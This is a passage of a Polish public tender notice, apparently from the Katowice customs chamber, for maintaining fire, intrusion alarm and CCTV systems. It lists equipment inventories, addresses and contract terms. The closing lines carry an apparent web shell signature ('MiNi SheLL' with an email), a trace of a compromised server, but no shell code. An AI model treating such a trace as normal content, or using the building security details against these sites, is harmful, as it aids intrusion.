Rybnik ul. Powstańców 8	12	
Razem	262	

Oferta winna zawierać koszt konserwacji kompletnej instalacji odrębnie dla każdej lokalizacji z rozbiciem na systemy antywłamaniowe i urządzenia obserwacji TV.
Składana oferta winna zawierać koszt 1 r-g. wraz z narzutami oraz kosztami dojazdu i materiałami pomocniczymi.
W cenie kwartalnej konserwacji systemów alarmowych Wykonawca powinien ująć koszt dojazdu do obiektów oraz zużycie materiałów pomocniczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.80.00.00-3, 45.31.22.00-9, 92.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja, modernizacja, naprawa oraz montaż systemów   przeciwpożarowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja, modernizacja, naprawa oraz montaż systemów   przeciwpożarowych:
 
a/ konserwacja funkcjonujących elektronicznych sieci przeciwpożarowych w jednostkach organizacyjnych Zamawiającego, zgodnie z poniższym wykazem musi być wykonywana w systemie rocznym (1 razy w roku). Przeglądy konserwacyjne roczne będą przeprowadzone w miesiącu wrześniu. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów, usuwania bieżących usterek oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw, modernizacji).
Koszt konserwacji obejmuje również dojazd oraz koszty niezbędnych materiałów pomocniczych, natomiast nie obejmuje wymiany baterii akumulatorów oraz usuwania uszkodzeń wykraczających poza  wynikłe z normalnego użytkowania.
W razie konieczności wymiany sygnalizatorów pożaru z wbudowanymi elementami izotopowymi   wykonawca jest zobowiązany do  utylizacji czujek uszkodzonych zgodnie z przepisami.

b/ naprawy związane sytuacjami awaryjnymi. Na wezwanie Zamawiającego Wykonawca zobowiązuje się do podjęcia działań do 24 godz. po zgłoszeniu awarii. Wykonawca jest zobowiązany do przedstawienia pisemnej kalkulacji kosztów  naprawy w rozbiciu na robociznę i materiały. Kalkulacja podlega zatwierdzeniu przez Zamawiającego na podstawie której zostanie wystawione zlecenie. Wyjątkowo (w sytuacjach nie cierpiących zwłoki) dopuszcza się możliwość uzgodnienia telefonicznego kosztów naprawy - przedstawienie kalkulacji (post factum).

W razie konieczności wymiany sygnalizatorów pożaru z wbudowanymi elementami izotopowymi   wykonawca jest zobowiązany do  utylizacji czujek uszkodzonych zgodnie z przepisami.

c/ modernizacja  zachodzi w sytuacji konieczności  zmian  w konfiguracji. Na żądanie Zamawiającego Wykonawca powinien sporządzić kalkulację kosztów wykonania nowych sieci, modernizacji, bądź ich demontażu sieci. Wykonanie nowej sieci musi być poprzedzone kalkulacją. 
Kalkulacja po zatwierdzeniu jest podstawą do wystawienia zlecenia na roboty. Po realizacji zlecenia wykonawca powinien sporządzić dokumentację powykonawczą oraz przeprowadzić szkolenie użytkowników w zakresie obsługi.
Materiały z demontażu instalacji, które można wtórnie wykorzystać Wykonawca winien protokolarnie przekazać Zamawiającemu. 
Na żądanie Zamawiającego Wykonawca powinien udokumentować koszt materiałów poprzez przedstawienie kserokopii faktur.
Nowo wykonane instalacje muszą być objęte co najmniej 12 miesięczną gwarancją. W ramach gwarancji wszelkie naprawy oraz cztery przeglądy konserwacyjne wykonywane będą nieodpłatnie za wyjątkiem udokumentowanych kosztów  materiałów (poza pomocniczymi).

Wykonanie usług konserwacji, naprawy, modernizacji winno być każdorazowo potwierdzone protokołem, podpisanym przez pracownika Wykonawcy oraz ze strony Zamawiającego przez Kierownika jednostki organizacyjnej lub upoważnionego pracownika. 
Protokół   Wykonawca winien dołączyć do faktury VAT  za wykonaną usługę.

Należność za wykonaną usługę płatna będzie na podstawie faktury VAT, przelewem w terminie do 21 dni od daty otrzymania faktury  z kompletem załączników.
Na fakturze należy przywołać numer dokumentu upoważniającego do realizacji (nr umowy, zlecenia).
Wykonawca jest zobowiązany do utrzymania w tajemnicy pod groźbą odpowiedzialności karnej, wszelkich informacji związanych z  realizacją robót.

Lokalizacja i wykaz wbudowanych urządzeń

     Lokalizacja
                                                                   


      Urządzenie	Magazyn likwidacyjny
Cieszyn 
ul. Mostowa 4	
Magazyn paliw
Cieszyn
ul. Mostowa 4

	Urząd Celny w Rybniku 
ul. Armii Krajowej 3
(segment D- budynek byłej siedziby banku BPH)
Centrala Ignis 1080	1 szt.		
Czujka optyczna DOR 30,35	30 szt.		
Czujka termiczna TUP 35,36	16 szt.		1 szt.
Ręczny ostrzegacz pożaru ROP30	6 szt.		
Sygnalizator SOA-24V			1 szt.
Czujka DIO 37 EX		4 szt.	
Gniazdo G31H		4 szt.	
Wskaźnik WZ31		1 szt.	
Separator 9167/13-11-00		1 szt.	
Centrala adresowalna CSP35A			1 szt.
Czujka izotopowa DIO31A2			68 szt.
Przycisk ROP 35A			3 szt.
Czujka DIO 37			9 szt.


Oferta winna zawierać koszt  konserwacji kompletnej instalacji odrębnie dla każdej lokalizacji. 
Składana oferta winna zawierać koszt 1 r-g. wraz z narzutami, kosztami dojazdu i materiałami pomocniczymi.
W cenie konserwacji systemów przeciwpożarowych Wykonawca powinien ująć koszt dojazdu do obiektów oraz zużycie materiałów pomocniczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.80.00.00-3, 45.31.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwacja systemów  antywłamaniowych, obserwacji TV..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja systemów  antywłamaniowych, obserwacji TV:

a/ konserwacja funkcjonujących elektronicznych sieci antywłamaniowych w jednostkach organizacyjnych Zamawiającego, zgodnie z poniższym wykazem musi być wykonywana w systemie kwartalnym - 4 razy w roku oraz  obserwacji TV musi być wykonana w systemie półrocznym - 2 razy w roku. Przeglądy konserwacyjne kwartalne będą przeprowadzone w styczniu, kwietniu, lipcu oraz październiku, natomiast przeglądy półroczne w miesiącu styczniu i lipcu. Dokładne terminy prowadzenia prac konserwacyjnych będą ustalane na bieżąco w trybie roboczym. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw).
Koszt konserwacji obejmuje również koszt dojazdu, natomiast nie obejmuje usuwania uszkodzeń wykraczających poza  normalne użytkowanie.

Wykonanie usług konserwacji winno być każdorazowo potwierdzone protokołem, podpisanym przez pracownika Wykonawcy oraz ze strony Zamawiającego przez Kierownika jednostki organizacyjnej lub upoważnionego pracownika. 
Protokół  Wykonawca winien dołączyć do faktury VAT  za wykonaną usługę.

Należność za wykonaną usługę płatna będzie na podstawie faktury VAT, przelewem w terminie do 21 dni od daty otrzymania faktury  z kompletem załączników.
Na fakturze należy przywołać numer dokumentu upoważniającego do realizacji (nr umowy).
Wykonawca jest zobowiązany do utrzymania w tajemnicy pod groźbą odpowiedzialności karnej, wszelkich informacji związanych z  realizacją usługi.

Lokalizacja systemów  antywłamaniowych 

Lp.	Lokalizacja systemu/adres	Ilość linii dozorowych SWiN	Urządzenia obserwacji TV
1	Izba Celna w Katowicach 
Katowice ul. Słoneczna 34	340	Kamery:
- VODN3750 1/3 - 4szt.
- Flexidome 2xd/n,540HTVL, 1/3 -33 szt.
-  seria 300, 26X, 460 TVL - 5 szt.
Rejestratory cyfrowe       -   3 szt.

Oferta winna zawierać koszt  konserwacji kompletnej instalacji.
W cenie konserwacji systemów alarmowych Wykonawca powinien ująć koszt dojazdu do obiektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.80.00.00-3, 92.22.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacja systemów przeciwpożarowych:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja systemów   przeciwpożarowych:
 
a/ konserwacja funkcjonujących elektronicznych sieci przeciwpożarowych w siedzibie Izbie Celnej w Katowicach zgodnie z poniższym wykazem musi być wykonywana w systemie rocznym. Przeglądy konserwacyjne roczne będą przeprowadzone w miesiącu wrześniu. Konserwacja polegać powinna na utrzymaniu systemu w stałej gotowości, tj. przegląd oraz fizyczne sprawdzenie funkcjonowania jej elementów, usuwania bieżących usterek oraz niezwłocznym zgłaszaniu Zamawiającemu konieczności wykonania niezbędnych prac (napraw).
Koszt konserwacji obejmuje również koszt dojazdu, natomiast nie obejmuje usuwania uszkodzeń wykraczających poza  normalne użytkowanie.

Wykonanie usług konserwacji winno być każdorazowo potwierdzone protokołem, podpisanym przez pracownika Wykonawcy oraz ze strony Zamawiającego przez Kierownika jednostki organizacyjnej lub upoważnionego pracownika. 
Protokół   Wykonawca winien dołączyć do faktury VAT  za wykonaną usługę.

Należność za wykonaną usługę płatna będzie na podstawie faktury VAT, przelewem w terminie do 21 dni od daty otrzymania faktury  z kompletem załączników.
Na fakturze należy przywołać numer dokumentu upoważniającego do realizacji (nr umowy).
Wykonawca jest zobowiązany do utrzymania w tajemnicy pod groźbą odpowiedzialności karnej, wszelkich informacji związanych z  realizacją usługi.

Lokalizacja i wykaz wbudowanych urządzeń.


                       Lokalizacja
                                                                   


      Urządzenie	Izba Celna w Katowicach
 ul. Słoneczna 34
Optyczna, uniwersalna czujka dymu DUR 4046	570 szt.
Optyczna czujka dymu DOR 4046	3 szt.
Gniazdo G40	573 szt.
Wskaźnik zadziałania WZ 31	15 szt.
Ręczny ostrzegacz pożarowy ROP 4001M	23 szt.
Element kontrolno sterujący EKS 4001	77szt.
Obudowa elementu kontrolno sterującego 4 - moduły 4xEKS	6 szt.
Obudowa elementu kontrolno sterującego 2 moduły 2xEKS	20 szt.
Obudowa elementu kontrolno sterującego 1 moduł 1xEKS	10 szt.
Centrala sygnalizacji pożaru, 8 pętli dozorowych POLON 4900	1 kpl.
Pakiet liniowy do centrali POLON 4900 MSL 2M	1 szt.
Zasilacz pożarowy KBZB - 17-24V-1A	2 kpl.
Zasilacz pożarowy bateriami 17Ah ZSP 135-D-7A-1	2 kpl.
Sygnalizator optyczno - akustyczny SA-K7	3 szt.
Puszka instalacyjna PIP-1A	30 szt.
Uniwersalna centrala sterująca UCS 4000	2 szt.
Centrala sterująca przewietrzaniem z bateriami AFG-2400/8A	3 kpl.
Dźwiękowy system ostrzegawczy	Sterownik sieciowy LBB 4401/00	1kpl.
	Rozdzielacz sieciowy LBB 4410/00	1 kpl.
	Interfejs światłowodowy wraz z kontrolerami LBB 4414/00	2 kpl.
	Podstawowa stacja mikrofonowa LBB 4430/00	3 kpl.
	Klawiatura stacji mikrofonowej LBB 4432/00	5 kpl.
	Zestaw nadzoru linii głośnikowych LBB 4442/00	20 kpl.
	Obudowa modułu nadzoru linii głośnikowej KBPP 05ABN	16 szt.
	Ceramiczna kostka z bezpiecznikiem termicznym  LBC 1256/00	16 szt.
	Wzmacniacz mocy  4x125W LBB 4424/00	5 kpl.
	Szafa aparaturowa z układem zasilania awaryjnego ZDSO400E-AK3	1 kpl.
	Głośniki LBC 3086/41	216 szt.
	Osłona pożarowa LBC 3081/02	216 kpl.
	Głośniki LBC 3018/00	34 kpl.


Oferta winna zawierać koszt  konserwacji kompletnej instalacji. 
W cenie konserwacji systemów przeciwpożarowych Wykonawca powinien ująć koszt dojazdu do obiektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com